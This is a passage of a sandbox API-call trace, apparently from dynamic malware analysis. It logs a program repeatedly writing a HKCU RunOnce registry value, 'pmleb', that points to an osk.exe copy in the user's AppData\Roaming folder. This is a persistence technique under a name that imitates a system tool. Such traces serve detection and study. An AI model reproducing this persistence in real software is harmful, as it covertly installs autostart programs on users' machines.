lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.497] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.497] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.497] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.497] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.498] RegCloseKey (hKey=0x280) returned 0x0 [0078.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.498] SetTimer (hWnd=0x20280, nIDEvent=0x2025, uElapse=0xa, lpTimerFunc=0x0) returned 0x2025 [0078.498] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.508] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.508] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.508] KillTimer (hWnd=0x20280, uIDEvent=0x2025) returned 1 [0078.508] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.508] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.508] IUnknown:Release (This=0x787518) returned 0x1 [0078.508] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.509] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.509] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.509] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.509] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.509] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0078.509] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.509] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x27 [0078.509] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.510] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0078.511] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.511] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.511] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.511] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.511] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.511] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.511] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.511] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.511] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.511] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.512] RegCloseKey (hKey=0x280) returned 0x0 [0078.512] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.512] SetTimer (hWnd=0x20280, nIDEvent=0x2026, uElapse=0xa, lpTimerFunc=0x0) returned 0x2026 [0078.512] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.127] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.127] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.128] KillTimer (hWnd=0x20280, uIDEvent=0x2026) returned 1 [0079.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.128] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.128] IUnknown:Release (This=0x787518) returned 0x1 [0079.128] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.128] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.128] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.129] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.129] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0079.129] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.129] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x28 [0079.129] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.130] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0079.130] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.130] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.130] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.130] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.130] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.130] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.131] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.131] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.131] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.131] RegCloseKey (hKey=0x280) returned 0x0 [0079.131] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.131] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.131] SetTimer (hWnd=0x20280, nIDEvent=0x2027, uElapse=0xa, lpTimerFunc=0x0) returned 0x2027 [0079.131] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.144] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.144] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.144] KillTimer (hWnd=0x20280, uIDEvent=0x2027) returned 1 [0079.145] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.145] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.145] IUnknown:Release (This=0x787518) returned 0x1 [0079.145] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.145] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.145] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.145] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.146] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0079.146] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.146] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x29 [0079.146] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.146] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0079.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.147] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.147] 